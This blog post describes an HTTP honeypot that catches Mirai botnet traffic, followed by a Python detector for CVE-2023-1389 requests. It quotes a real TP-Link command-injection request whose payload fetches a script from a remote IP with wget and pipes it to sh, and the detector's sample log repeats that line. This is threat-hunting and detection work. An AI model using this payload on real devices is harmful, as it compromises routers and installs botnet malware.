Connor Gadbois
Hunting Mirai In The Wild

July 07, 2025 | Connor Gadbois

Botnets

As a follow-up to my previous post, I wanted to see how Mirai is being used today. Like the original version, the modded versions use (among many methods) vulnerabilities in HTTP services running on routers, IoT devices, etc., as a way to get onto machines. So I'll start by setting up an HTTP honeypot to catch requests.


I wrote a simple Python Flask app that responds to all requests with an empty 200 response, then logs all details about the request to a PostgreSQL database.


Early on while testing, I got an HTTP GET request for the URL:

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget+http://220.158.232.99/x/tplink+-O-|sh)


This seems to be related to CVE-2023-1389, an unauthenticated command injection vulnerability for the TP-Link Archer AX21 (AX1800). I downloaded the tplink file it references and found:


This is typical of a Mirai download script; however, the comment is interesting. It suggests that the attacker probably isn't very advanced and, this is speculation, but I assume that this script and the malware were given to them or were bought from someone packaging up Mirai as an easy-to-set-up botnet kit. This finding shows that an HTTP honeypot might be an effective way to catch the payloads that get dropped in these attacks.
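As an added example (my own code, not the post's honeypot), here is a small detector that can run over the request records the honeypot logs and flag the CVE-2023-1389 pattern above, pulling the stager URL out of the injected command so it can be collected and the host blocked. The log-line format and the 203.0.113.x client addresses are constructed for the example; the third target is the request shown above.

```python
"""Detector for the CVE-2023-1389 request pattern in an HTTP honeypot log.
Added example, not the post's code. Flags the Archer AX21 luci `locale`
endpoint with operation=write and a shell substitution in `country`, and
extracts any URL the injected command fetches (the stager to collect)."""
import re
from urllib.parse import parse_qs, urlsplit

# Vulnerable endpoint; urlsplit keeps the ';stok=' segment inside the path.
LUCI_LOCALE_RE = re.compile(r"^/cgi-bin/luci/;stok=[^/]*/locale$")
# Command substitution, backticks, or a pipe into a shell inside the value.
SHELL_INJECT_RE = re.compile(r"\$\(|`|\|\s*(?:ba)?sh\b")
URL_RE = re.compile(r"https?://[^\s'\"|;)]+")

# Constructed sample log lines: "<timestamp> <client> <method> <target>".
# The third target is the request seen in the post; clients are TEST-NET.
SAMPLE_LOG = [
    "2025-07-01T10:00:00Z 203.0.113.5 GET /",
    "2025-07-01T10:00:03Z 203.0.113.5 GET /cgi-bin/luci/;stok=/locale?form=country&operation=read",
    "2025-07-01T10:02:17Z 203.0.113.9 GET /cgi-bin/luci/;stok=/locale?form=country"
    "&operation=write&country=$(wget+http://220.158.232.99/x/tplink+-O-|sh)",
]


def analyze_target(target):
    """Return a finding for an exploit attempt, or None for benign/probe traffic."""
    parts = urlsplit(target)
    if not LUCI_LOCALE_RE.match(parts.path):
        return None
    # parse_qs also turns '+' into spaces and decodes percent-escapes.
    params = parse_qs(parts.query, keep_blank_values=True)
    country = params.get("country", [""])[0]
    if params.get("operation") != ["write"] or not SHELL_INJECT_RE.search(country):
        return None
    return {"cve": "CVE-2023-1389", "payload": country,
            "download_urls": URL_RE.findall(country)}


def scan_log(lines):
    """Run analyze_target over log lines; attach time and client to each hit."""
    findings = []
    for line in lines:
        ts, client, method, target = line.split(" ", 3)
        hit = analyze_target(target)
        if hit:
            findings.append({"time": ts, "client": client, "method": method, **hit})
    return findings
```

A plain locale read without a shell substitution is reported as nothing, so scanner probes of the endpoint do not drown out real exploit attempts.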


I'll post about any interesting findings from this data as I come across them.